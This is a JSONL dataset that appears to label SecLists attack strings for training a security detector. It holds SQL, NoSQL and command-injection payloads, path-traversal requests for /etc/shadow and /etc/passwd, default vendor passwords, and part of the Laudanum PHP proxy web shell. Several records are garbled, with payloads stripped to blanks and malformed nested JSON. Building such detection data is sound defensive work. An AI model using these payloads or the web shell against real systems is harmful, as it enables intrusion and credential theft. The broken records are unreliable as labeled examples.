click this!#x", "injection_type": "XSS"}}]}
{"id": "seclists_02811", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: '&echo%20WHTJDF$((87%2B5))$(echo%20WHTJDF)WHTJDF%7C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'&echo%20WHTJDF$((87%2B5))$(echo%20WHTJDF)WHTJDF%7C", "injection_type": "cmd"}}]}
{"id": "seclists_02812", "source": "seclists", "source_license": "MIT", "text": "username=0&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "0", "injection_type": "SQL"}}]}
{"id": "seclists_02813", "source": "seclists", "source_license": "MIT", "text": "password: Motorola,service,smile,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Motorola,service,smile,"}}]}
{"id": "seclists_02814", "source": "seclists", "source_license": "MIT", "text": "username=%2A%7C&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2A%7C", "injection_type": "SQL"}}]}
{"id": "seclists_02815", "source": "seclists", "source_license": "MIT", "text": "\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: '];a=eval;b=alert;a(b(15));//", "injection_type": "XSS"}}]}
{"id": "seclists_02817", "source": "seclists", "source_license": "MIT", "text": "username=admin\"or 1=1 or \"\"=\"&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin\"or 1=1 or \"\"=\"", "injection_type": "SQL"}}]}
{"id": "seclists_02818", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=test HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "test ", "injection_type": "XSS"}}]}
{"id": "seclists_02819", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Name: Obfuscated name trigger for Firefox HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Obfuscated name trigger for Firefox", "injection_type": "XSS"}}]}
{"id": "seclists_02820", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'or (EXISTS)';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or (EXISTS)", "injection_type": "SQL"}}]}
{"id": "seclists_02821", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'declare @q nvarchar (4000) select @q =';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "declare @q nvarchar (4000) select @q =", "injection_type": "SQL"}}]}
{"id": "seclists_02822", "source": "seclists", "source_license": "MIT", "text": "password: BizDesign,Admin,ImageFolio,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "BizDesign,Admin,ImageFolio,"}}]}
{"id": "seclists_02823", "source": "seclists", "source_license": "MIT", "text": " test\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "test ", "injection_type": "XSS"}}]}
{"id": "seclists_02824", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %0A%20str%3D%24%28echo%20JGUTOJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20JGUTOJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26", "injection_type": "cmd"}}]}
{"id": "seclists_02825", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%7Cecho$IFSUXKUGT$((68%2B89))$(echo$IFSUXKUGT)UXKUGT%5C%5C HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7Cecho$IFSUXKUGT$((68%2B89))$(echo$IFSUXKUGT)UXKUGT%5C%5C", "injection_type": "cmd"}}]}
{"id": "seclists_02826", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=!' HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "!'", "injection_type": "cmd"}}]}
{"id": "seclists_02827", "source": "seclists", "source_license": "MIT", "text": "\n\n\n\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "", "injection_type": "SSI"}}]}
{"id": "seclists_02828", "source": "seclists", "source_license": "MIT", "text": "\nExploit Tags: general, evil tags
\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags", "injection_type": "XSS"}}]}
{"id": "seclists_02829", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: x' or name()='username' or 'x'='y", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "x' or name()='username' or 'x'='y", "injection_type": "cmd"}}]}
{"id": "seclists_02830", "source": "seclists", "source_license": "MIT", "text": "filename=%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F", "injection_type": "cmd"}}]}
{"id": "seclists_02831", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BKAIFJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BKAIFJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F", "injection_type": "cmd"}}]}
{"id": "seclists_02832", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = and 1 in (select var from temp)--", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "and 1 in (select var from temp)--", "injection_type": "SQL"}}]}
{"id": "seclists_02833", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=< HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<", "injection_type": "cmd"}}]}
{"id": "seclists_02834", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ||echo$IFSWYWPXY$((38%2B95))$(echo$IFSWYWPXY)WYWPXY//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "||echo$IFSWYWPXY$((38%2B95))$(echo$IFSWYWPXY)WYWPXY//", "injection_type": "cmd"}}]}
{"id": "seclists_02835", "source": "seclists", "source_license": "MIT", "text": "\nProtocol resolution in script tags
", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Protocol resolution in script tags", "injection_type": "XSS"}}]}
{"id": "seclists_02836", "source": "seclists", "source_license": "MIT", "text": "filename=%2527%3B%20str%3D%24%28echo%20NSSNST%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2527%3B%20str%3D%24%28echo%20NSSNST%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C", "injection_type": "cmd"}}]}
{"id": "seclists_02837", "source": "seclists", "source_license": "MIT", "text": "password: packer\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "packer"}}]}
{"id": "seclists_02838", "source": "seclists", "source_license": "MIT", "text": "POST /api/login HTTP/1.1\nContent-Type: application/json\n\n', $where: '1 == 1'", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "', $where: '1 == 1'", "injection_type": "NoSQL"}}]}
{"id": "seclists_02839", "source": "seclists", "source_license": "MIT", "text": "password: mushroom\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "mushroom"}}]}
{"id": "seclists_02840", "source": "seclists", "source_license": "MIT", "text": "password: secrets\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "secrets"}}]}
{"id": "seclists_02841", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:Novell,GUEST,GUEST,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Novell,GUEST,GUEST,"}}]}
{"id": "seclists_02842", "source": "seclists", "source_license": "MIT", "text": "filename=0xfffffff", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "0xfffffff", "injection_type": "cmd"}}]}
{"id": "seclists_02843", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=/../../../../../../../../../../etc/shadow^^ HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "/../../../../../../../../../../etc/shadow^^", "injection_type": "cmd"}}]}
{"id": "seclists_02844", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=2323\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "2323"}}]}
{"id": "seclists_02845", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '21 %';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "21 %", "injection_type": "SQL"}}]}
{"id": "seclists_02846", "source": "seclists", "source_license": "MIT", "text": "filename=%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BODWQD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BODWQD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F", "injection_type": "cmd"}}]}
{"id": "seclists_02847", "source": "seclists", "source_license": "MIT", "text": "\ntest
\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "test ", "injection_type": "XSS"}}]}
{"id": "seclists_02848", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %0A%20str%3D%24%28echo%20NFRBHV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20NFRBHV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27", "injection_type": "cmd"}}]}
{"id": "seclists_02849", "source": "seclists", "source_license": "MIT", "text": "\n\n\n\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "", "injection_type": "SSI"}}]}
{"id": "seclists_02850", "source": "seclists", "source_license": "MIT", "text": " test\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "test ", "injection_type": "XSS"}}]}
{"id": "seclists_02851", "source": "seclists", "source_license": "MIT", "text": "filename=;id\\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ";id\\n", "injection_type": "cmd"}}]}
{"id": "seclists_02852", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %26%20sleep%200%20%26%26%20str%3D%24%28echo%20UIVPGT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UIVPGT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526", "injection_type": "cmd"}}]}
{"id": "seclists_02853", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:daddy", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "daddy"}}]}
{"id": "seclists_02854", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'admin') or ('1'='1';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin') or ('1'='1", "injection_type": "SQL"}}]}
{"id": "seclists_02855", "source": "seclists", "source_license": "MIT", "text": "password: picher\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "picher"}}]}
{"id": "seclists_02856", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=test HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "test ", "injection_type": "XSS"}}]}
{"id": "seclists_02857", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=|id| HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "|id|", "injection_type": "cmd"}}]}
{"id": "seclists_02858", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'bfilename';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "bfilename", "injection_type": "SQL"}}]}
{"id": "seclists_02859", "source": "seclists", "source_license": "MIT", "text": "password: AWARD,,wodj,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "AWARD,,wodj,"}}]}
{"id": "seclists_02860", "source": "seclists", "source_license": "MIT", "text": " \" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": " ", "injection_type": "XSS"}}]}
{"id": "seclists_02861", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=Xerox,admin,x-admin,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Xerox,admin,x-admin,"}}]}
{"id": "seclists_02862", "source": "seclists", "source_license": "MIT", "text": "\n
", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": " ", "injection_type": "XSS"}}]}
{"id": "seclists_02863", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf \\x3D \\x3B'", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\x3D \\x3B'", "injection_type": "cmd"}}]}
{"id": "seclists_02864", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:UNIX,web,web,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "UNIX,web,web,"}}]}
{"id": "seclists_02865", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd", "injection_type": "cmd"}}]}
{"id": "seclists_02866", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=Oracle,PORTAL30_SSO_PUBLIC,PORTAL30_SSO_PUBLIC,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Oracle,PORTAL30_SSO_PUBLIC,PORTAL30_SSO_PUBLIC,"}}]}
{"id": "seclists_02867", "source": "seclists", "source_license": "MIT", "text": "\n\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\n\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": " ", "injection_type": "XSS"}}]}
{"id": "seclists_02870", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:Sharp,,sysadm,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Sharp,,sysadm,"}}]}
{"id": "seclists_02871", "source": "seclists", "source_license": "MIT", "text": " XSS\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: XSS ", "injection_type": "XSS"}}]}
{"id": "seclists_02872", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=||/usr/bin/id; HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "||/usr/bin/id;", "injection_type": "cmd"}}]}
{"id": "seclists_02873", "source": "seclists", "source_license": "MIT", "text": "\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\nExploit Tags: URI exploits, injection, general, obfuscated, internet explorer
", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: URI exploits, injection, general, obfuscated, internet explorer", "injection_type": "XSS"}}]}
{"id": "seclists_02877", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit String: HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: ", "injection_type": "XSS"}}]}
{"id": "seclists_02878", "source": "seclists", "source_license": "MIT", "text": "\nBackslash-obfuscated XBL injection - variant 1
\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Backslash-obfuscated XBL injection - variant 1", "injection_type": "XSS"}}]}
{"id": "seclists_02879", "source": "seclists", "source_license": "MIT", "text": "\n\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags, obfuscated", "injection_type": "XSS"}}]}
{"id": "seclists_02881", "source": "seclists", "source_license": "MIT", "text": "username=union select * from users where login = char ...&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "union select * from users where login = char ...", "injection_type": "SQL"}}]}
{"id": "seclists_02882", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=') or ('x')=('x HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "') or ('x')=('x", "injection_type": "SQL"}}]}
{"id": "seclists_02883", "source": "seclists", "source_license": "MIT", "text": "\n
\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": " ", "injection_type": "XSS"}}]}
{"id": "seclists_02884", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=&echo$IFSHBNWJW$((18%2B27))$(echo$IFSHBNWJW)HBNWJW%26 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&echo$IFSHBNWJW$((18%2B27))$(echo$IFSHBNWJW)HBNWJW%26", "injection_type": "cmd"}}]}
{"id": "seclists_02885", "source": "seclists", "source_license": "MIT", "text": " test\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "test ", "injection_type": "XSS"}}]}
{"id": "seclists_02886", "source": "seclists", "source_license": "MIT", "text": "\n***\n*** Copyright 2014 by Kevin Johnson and the Laudanum Team\n***\n********************************************************************************\n***\n*** This file allows browsing of the file system.\n*** Written by Tim Medin \n***\n********************************************************************************\n*** This program is free software; you can redistribute it and/or\n*** modify it under the terms of the GNU General Public License\n*** as published by the Free Software Foundation; either version 2\n*** of the License, or (at your option) any later version.\n***\n*** This program is distributed in the hope that it will be useful,\n*** but WITHOUT ANY WARRANTY; without even the implied warranty of\n*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n*** GNU General Public License for more details.\n***\n*** You can get a copy of the GNU General Public License from this\n*** address: http://www.gnu.org/copyleft/gpl.html#SEC1\n*** You can also write to the Free Software Foundation, Inc., 59 Temple\n*** Place - Suite 330, Boston, MA 02111-1307, USA.\n***\n***************************************************************************** */\n\n// TODO: If the remote site uses a sessionid it collides with the php sessionid cookie from this page\n// figure out how to reuse sessionid from the remote site\n\n// ***************** Config entries below ***********************\n\n// IPs are enterable as individual addresses TODO: add CIDR support\n$allowedIPs = array(\"19.168.2.16\", \"192.168.1.100\",\"127.0.0.1\",\"192.168.10.129\",\"192.168.10.1\");\n\n# *********** No editable content below this line **************\n\n$allowed = 0;\nforeach ($allowedIPs as $IP) {\n if ($_SERVER[\"REMOTE_ADDR\"] == $IP)\n $allowed = 1;\n}\n\nif ($allowed == 0) {\n header(\"HTTP/1.0 404 Not Found\");\n die();\n}\n\n/* This error handler will turn all notices, warnings, and errors into fatal\n * errors, unless they have been suppressed with the @-operator. */\nfunction error_handler($errno, $errstr, $errfile, $errline, $errcontext) {\n /* The @-opertor (used with chdir() below) temporarely makes\n * error_reporting() return zero, and we don't want to die in that case.\n * We do note the error in the output, though. */\n if (error_reporting() == 0) {\n $_SESSION['output'] .= $errstr . \"\\n\";\n } else {\n die('\n\n\n Laudanum PHP Proxy \n\n\n Fatal Error! \n ' . $errstr . '
\n in ' . $errfile . ' , line ' . $errline . ' .
\n\n \n \n Copyright © 2014, Kevin Johnson and the Laudanum team. \n Written by Tim Medin. \n Get the latest version at laudanum.secureideas.net .\n \n\n\n');\n }\n}\n\nset_error_handler('error_handler');\n\nfunction geturlarray($u) {\n // creates the url array, addes a scheme if it is missing and retries parsing\n $o = parse_url($u);\n if (!isset($o[\"scheme\"])) { $o = parse_url(\"http://\" . $u); }\n if (!isset($o[\"path\"])) { $o[\"path\"] = \"/\"; }\n return $o;\n}\n\nfunction buildurl ($u) {\n // build the url from the url array\n // this is used because the built in function isn't \n // avilable in all installs of php\n if (!isset($u[\"host\"])) { return null; }\n\n $s = isset($u[\"scheme\"]) ? $u[\"scheme\"] : \"http\";\n $s .= \"://\" . $u[\"host\"];\n $s .= isset($u[\"port\"]) ? \":\" . $", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "php", "filename": "proxy.php"}}]}
{"id": "seclists_02887", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf <", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<", "injection_type": "cmd"}}]}
{"id": "seclists_02888", "source": "seclists", "source_license": "MIT", "text": "\nExploit Tags: general, evil tags, internet explorer
", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags, internet explorer", "injection_type": "XSS"}}]}
{"id": "seclists_02889", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=jedi\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "jedi"}}]}
{"id": "seclists_02890", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'select name from syscolumns where id = (sele ...';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "select name from syscolumns where id = (sele ...", "injection_type": "SQL"}}]}
{"id": "seclists_02891", "source": "seclists", "source_license": "MIT", "text": " hover this!\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "hover this!", "injection_type": "XSS"}}]}
{"id": "seclists_02892", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=+ HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "+", "injection_type": "cmd"}}]}
{"id": "seclists_02893", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ..%c0%af", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "..%c0%af", "injection_type": "cmd"}}]}
{"id": "seclists_02894", "source": "seclists", "source_license": "MIT", "text": "password: Hewlett-Packard,MGR,RJE,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Hewlett-Packard,MGR,RJE,"}}]}
{"id": "seclists_02895", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=test HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "test ", "injection_type": "XSS"}}]}
{"id": "seclists_02896", "source": "seclists", "source_license": "MIT", "text": "\n
\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": " ", "injection_type": "XSS"}}]}
{"id": "seclists_02897", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i", "injection_type": "cmd"}}]}
{"id": "seclists_02898", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = \"*\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"*\"", "injection_type": "SQL"}}]}
